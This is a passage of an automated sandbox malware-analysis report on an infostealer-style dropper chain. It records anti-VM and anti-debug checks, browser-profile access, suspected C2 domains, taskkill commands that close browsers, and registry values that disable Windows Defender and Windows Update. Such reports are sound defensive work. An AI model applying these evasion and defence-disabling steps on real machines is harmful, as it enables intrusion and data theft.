                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598\Jump to behavior
                          Source: skotes.exe, skotes.exe, 00000002.00000002.1821530890.0000000000AD5000.00000040.00000001.01000000.00000007.sdmp, 7b9f3f6834.exe, 7b9f3f6834.exe, 00000009.00000002.2845775856.0000000001130000.00000040.00000001.01000000.0000000A.sdmp, a78a39a396.exe, a78a39a396.exe, 0000000A.00000002.3177305598.00000000010AD000.00000040.00000001.01000000.0000000B.sdmp, a78a39a396.exe, 0000001E.00000002.3262070308.00000000010AD000.00000040.00000001.01000000.0000000B.sdmp, 76dd304e1d.exe, 00000020.00000002.3000596780.000000000095A000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: a78a39a396.exe, 0000000A.00000002.3193106380.000000000196E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareE
                          Source: firefox.exe, 00000021.00000002.2924745599.000001F3C3C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
                          Source: firefox.exe, 00000021.00000002.2919491987.000001F3C343A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@b
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;
                          Source: firefox.exe, 0000001D.00000002.2921550044.000001C301108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.000000000164A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000002.2849912113.000000000168F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.00000000019B4000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2876379077.00000000019EF000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2949106642.00000000019EF000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2902024958.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2995909673.00000000019EF000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019EE000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2874285828.00000000019EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: a78a39a396.exe, 0000001E.00000002.3249141713.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: firefox.exe, 0000001D.00000002.2920768237.000001C30101C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                          Source: firefox.exe, 00000021.00000002.2924745599.000001F3C3C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                          Source: file.exe, 00000000.00000002.1775211525.0000000001025000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1807978287.0000000000AD5000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1821530890.0000000000AD5000.00000040.00000001.01000000.00000007.sdmp, 7b9f3f6834.exe, 00000009.00000002.2845775856.0000000001130000.00000040.00000001.01000000.0000000A.sdmp, a78a39a396.exe, 0000000A.00000002.3177305598.00000000010AD000.00000040.00000001.01000000.0000000B.sdmp, a78a39a396.exe, 0000001E.00000002.3262070308.00000000010AD000.00000040.00000001.01000000.0000000B.sdmp, 76dd304e1d.exe, 00000020.00000002.3000596780.000000000095A000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: firefox.exe, 0000001D.00000002.2921550044.000001C301108000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2924745599.000001F3C3C60000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2894946283.000001954B753000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: SIWVID
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSystem information queried: KernelDebuggerInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess queried: DebugPort
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeProcess queried: DebugPort
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeProcess queried: DebugPort
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05050536 rdtsc 0_2_05050536
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeMemory protected: page guard

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 7920, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: a78a39a396.exe PID: 8040, type: MEMORYSTR
                          Source: 7b9f3f6834.exeString found in binary or memory: p3ar11fter.sbs
                          Source: 7b9f3f6834.exeString found in binary or memory: 3xp3cts1aim.sbs
                          Source: 7b9f3f6834.exeString found in binary or memory: p10tgrace.sbs
                          Source: 7b9f3f6834.exeString found in binary or memory: peepburry828.sbs
                          Source: 7b9f3f6834.exeString found in binary or memory: processhol.sbs
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe "C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe "C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe "C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe "C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe "C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCFCGIIEHIE.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsCFCGIIEHIE.exe "C:\Users\user\DocumentsCFCGIIEHIE.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: aca7749dee.exe, 0000000C.00000000.2743259992.0000000000BE2000.00000002.00000001.01000000.0000000C.sdmp, aca7749dee.exe, 00000024.00000000.2899989600.0000000000BE2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: 7b9f3f6834.exe, 00000009.00000002.2845775856.0000000001130000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: oF&s:Program Manager
                          Source: skotes.exe, skotes.exe, 00000002.00000002.1821530890.0000000000AD5000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: 8Program Manager
                          Source: 76dd304e1d.exe, 00000020.00000002.3002239730.00000000009A3000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: Program Manager
                          Source: 7b9f3f6834.exe, 7b9f3f6834.exe, 00000009.00000002.2845775856.0000000001130000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: F&s:Program Manager
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeRegistry value created: TamperProtection 0
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2949106642.00000000019EF000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2995909673.00000000019EF000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019EE000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2949106642.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 0.2.file.exe.e30000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 54.2.DocumentsCFCGIIEHIE.exe.ee0000.0.unpack, type: UNPACKEDPE
